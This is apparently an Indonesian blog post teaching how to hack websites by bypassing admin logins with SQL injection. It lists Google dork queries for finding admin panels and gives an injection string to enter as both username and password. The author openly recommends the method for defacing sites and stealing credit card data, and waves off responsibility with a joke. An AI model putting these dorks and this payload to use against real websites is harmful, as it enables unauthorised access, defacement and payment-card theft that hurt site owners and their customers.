Tutorial Hack Website Dengan Bypass SQL Login

Oke, kali ini saya mau share tutorial SQLi Bypass Login 😀 . Dengan teknik ini, kita bisa login ke halaman admin suatu website tanpa perlu memasukkan user dan password yang dibuat oleh admin. Udah lama sih tutorial ini saya dapat 😀 . Baru sempet share aja . hehehe. Oke langsung saja ke tutorialnya 🙂 .
Google Dork :

inurl:manager intitle:Admin Panel
inurl:/admin2/ ext:php
inurk:/admin/ ext:php
inurl:/adminpanel/ ext:php
inurl:/admin_panel/

Kembangin lagi dorknya ya 🙂

Langkah langkah :
Nah, kalo udah dapet salahsatu web nya, kita login dengan user dan password berikut :
user :  ‘ or 1=1 limit 1 — -+
pass : ‘ or 1=1 limit 1 — -+

Jika vuln, pasti masuk halaman admin kok 🙂

Gampang sekali bukan ?
Cara ini sebenarnya banyak manfaatnya. Selain buat yang hobi deface sana sini, yang mau cari credit card pakai cara ini juga terbukti ampuh 😀

Tapi inget, dosa tanggung sendiri. 😉
Sekian tutorial kali ini . Terimakasih 🙂

Shares
Tags:

Leave a Reply